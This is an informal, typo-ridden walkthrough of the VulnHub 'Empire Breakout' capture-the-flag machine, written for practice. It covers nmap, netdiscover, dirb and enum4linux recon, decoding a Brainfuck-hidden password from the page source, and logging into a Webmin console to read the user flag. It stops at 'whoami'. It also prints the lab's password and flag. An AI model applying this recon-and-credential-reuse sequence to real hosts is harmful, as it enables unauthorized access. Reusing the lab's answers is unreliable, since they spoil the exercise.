   


                    Empire Breakout 
				 -----------------------
https://medium.com/@the.opemi.aa/walk-through-vulnhub-empire-breakout-c36a43ab4b46				 
				 
The machine will automatically be assigned an IP address from the network DHCP. It will be visible on the login screen. The target machine's IP address can be seen in the following screenshot. 		

DHCP: The Dynamic Host Configuration Protocol:a network management protocol used on Internet Protocol (IP) networks for automatically assigning IP addresses and other communication parameters to devices connected to the network using a client–server architecture.[
		 
The  ip will appear  on start up screen . 	 192.168.1.205
1. try to run ping 192.168.1.205 
 
2.  sudo  netdiscover -r  192.168.1.0/24
    output: 
     

3.  nmap -sC -sV -vvv 192.168.1.205
   output(importent lines  :
     PORT      STATE SERVICE     REASON  VERSION
     80/tcp    open  http        syn-ack Apache httpd 2.4.51 ((Debian))
                      |_http-server-header: Apache/2.4.51 (Debian)
 

     993/tcp   open  tcpwrapped  syn-ack
     995/tcp   open  tcpwrapped  syn-ack
1    10000/tcp open  http        syn-ack MiniServ 1.981 (Webmin httpd 
     20000/tcp open  http        syn-ack MiniServ 1.830 (Webmin httpd)
|       http-methods: 
|         _  Supported Methods: GET HEAD POST OPTIONS

     you can also run 
	    nmap -p80,139,445,10000,20000 -A 192.168.1.205
		
		
 
 4. since we found port 80 there is  aserver so we can open it 
    you cant open firefox on http://192.168.1.205/  
    and look at the source code 
     at the end  you will find this string :
 

<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.


-->
5.   scan all dir of the server 
       dirb http://192.168.1.205
6. move to  https://www.dcode.fr/brainfuck-language
   input the string and the Passward is:
      .2uqPEfj3D<P'a-3

6.  we now have a password, but no users?

	run :
       enum4linux 192.168.1.205
	 at the end of a long output you will found the next line:
	  S-1-22-1-1000 Unix User\cyber (Local User)

7. TCP 10000 and TCP 20000, appear to be hosting websites 
  	  
	  in firefox goto: http://192.168.1.205:20000
	      and input user=cyber   passward = .2uqPEfj3D<P'a-3
8. on the left lower part of the screen there is a console button	
   press the button  and run 'ls' . you will find a file named 'user.txt'
   run 'cat user.txt' and you will  find the flg  
   
   $ cat user.txt
    3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
	
9. run the nnext commands
    whoami : 	
   